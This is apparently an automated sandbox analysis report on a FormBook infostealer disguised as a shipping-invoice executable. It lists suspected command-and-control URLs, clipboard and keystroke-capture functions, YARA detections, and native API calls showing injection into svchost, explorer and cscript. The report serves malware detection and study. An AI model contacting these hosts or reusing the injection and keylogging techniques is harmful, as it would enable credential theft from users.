Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kapten69pola.xyz/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kapten69pola.xyz/jd21/www.tyumk.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kapten69pola.xyzReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kjsdhklssk73.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kjsdhklssk73.xyz/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kjsdhklssk73.xyz/jd21/www.arthemis-168bet.site
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kjsdhklssk73.xyzReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mantapnagita777.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mantapnagita777.com/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mantapnagita777.com/jd21/www.kapten69pola.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mantapnagita777.comReferer:
Source: explorer.exe, 00000003.00000002.869588514.00000000078E6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.350006795.00000000078F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.869194618.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.350006795.0000000007972000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.868840236.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.349305261.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.349644935.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000003.00000002.869588514.00000000078E6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.350006795.00000000078F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.869194618.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.350006795.0000000007972000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.868840236.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.349305261.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.349644935.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000003.00000002.868840236.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.349305261.000000000260E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerxe
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thepowerofzeus.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thepowerofzeus.com/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thepowerofzeus.com/jd21/www.alivioquantico.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thepowerofzeus.comReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tyumk.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tyumk.xyz/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tyumk.xyz/jd21/www.amsya.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tyumk.xyzReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.uhug.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.uhug.xyz/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.uhug.xyz/jd21/www.crucka.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.uhug.xyzReferer:
Source: explorer.exe, 00000003.00000000.348892322.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.868529966.00000000001D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000003.00000000.348892322.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.868529966.00000000001D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000003.00000000.348892322.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.868529966.00000000001D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012BEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_012BEAFF

Contains functionality to modify clipboard data

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012BED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_012BED6A

Contains functionality to read the clipboard data

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

0_2_012BEAFF

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012AAB9C GetKeyState,GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_012AAB9C

Potential key logger detected (key state polling based)

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012D9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_012D9576

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe PID: 2412, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: svchost.exe PID: 236, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: cscript.exe PID: 1368, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Binary is likely a compiled AutoIt script file

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_22b1eab7-2
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_a398b267-a
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_0ace506a-3
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_206c2ff5-4

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior

Contains functionality to call native functions

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A350 NtCreateFile,	2_2_0041A350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A400 NtReadFile,	2_2_0041A400
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A480 NtClose,	2_2_0041A480
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A530 NtAllocateVirtualMemory,	2_2_0041A530
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A47A NtClose,	2_2_0041A47A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00730078 NtResumeThread,LdrInitializeThunk,	2_2_00730078
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00730048 NtProtectVirtualMemory,LdrInitializeThunk,	2_2_00730048
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007300C4 NtCreateFile,LdrInitializeThunk,	2_2_007300C4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072F900 NtReadFile,LdrInitializeThunk,	2_2_0072F900
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072F9F0 NtClose,LdrInitializeThunk,	2_2_0072F9F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FAE8 NtQueryInformationProcess,LdrInitializeThunk,	2_2_0072FAE8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	2_2_0072FAD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FB68 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_0072FB68
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FBB8 NtQueryInformationToken,LdrInitializeThunk,	2_2_0072FBB8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FC60 NtMapViewOfSection,LdrInitializeThunk,	2_2_0072FC60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FC90 NtUnmapViewOfSection,LdrInitializeThunk,	2_2_0072FC90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FDC0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_0072FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FD8C NtDelayExecution,LdrInitializeThunk,	2_2_0072FD8C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	2_2_0072FED0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FEA0 NtReadVirtualMemory,LdrInitializeThunk,	2_2_0072FEA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FFB4 NtCreateSection,LdrInitializeThunk,	2_2_0072FFB4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00730060 NtQuerySection,	2_2_00730060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0073010C NtOpenDirectoryObject,	2_2_0073010C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007301D4 NtSetValueKey,	2_2_007301D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007307AC NtCreateMutant,	2_2_007307AC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00730C40 NtGetContextThread,	2_2_00730C40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007310D0 NtOpenProcessToken,	2_2_007310D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00731148 NtOpenThread,	2_2_00731148
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072F8CC NtWaitForSingleObject,	2_2_0072F8CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00731930 NtSetContextThread,	2_2_00731930
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072F938 NtWriteFile,	2_2_0072F938
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FA50 NtEnumerateValueKey,	2_2_0072FA50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FA20 NtQueryInformationFile,	2_2_0072FA20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FAB8 NtQueryValueKey,	2_2_0072FAB8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FB50 NtCreateKey,	2_2_0072FB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FBE8 NtQueryVirtualMemory,	2_2_0072FBE8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FC48 NtSetInformationFile,	2_2_0072FC48
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FC30 NtOpenProcess,	2_2_0072FC30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FD5C NtEnumerateKey,	2_2_0072FD5C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00731D80 NtSuspendThread,	2_2_00731D80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FE24 NtWriteVirtualMemory,	2_2_0072FE24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FF34 NtQueueApcThread,	2_2_0072FF34
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0072FFFC NtCreateProcessEx,	2_2_0072FFFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0038A036 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,	2_2_0038A036
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0038A042 NtQueryInformationProcess,	2_2_0038A042
Source: C:\Windows\explorer.exe	Code function: 3_2_0909EE12 NtProtectVirtualMemory,	3_2_0909EE12
Source: C:\Windows\explorer.exe	Code function: 3_2_0909D232 NtCreateFile,	3_2_0909D232
Source: C:\Windows\explorer.exe	Code function: 3_2_0909EE0A NtProtectVirtualMemory,	3_2_0909EE0A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020900C4 NtCreateFile,LdrInitializeThunk,	4_2_020900C4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020907AC NtCreateMutant,LdrInitializeThunk,	4_2_020907AC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FAB8 NtQueryValueKey,LdrInitializeThunk,	4_2_0208FAB8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_0208FAD0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FAE8 NtQueryInformationProcess,LdrInitializeThunk,	4_2_0208FAE8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FB50 NtCreateKey,LdrInitializeThunk,	4_2_0208FB50
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FB68 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_0208FB68
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FBB8 NtQueryInformationToken,LdrInitializeThunk,	4_2_0208FBB8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208F900 NtReadFile,LdrInitializeThunk,	4_2_0208F900
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208F9F0 NtClose,LdrInitializeThunk,	4_2_0208F9F0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	4_2_0208FED0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FFB4 NtCreateSection,LdrInitializeThunk,	4_2_0208FFB4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FC60 NtMapViewOfSection,LdrInitializeThunk,	4_2_0208FC60
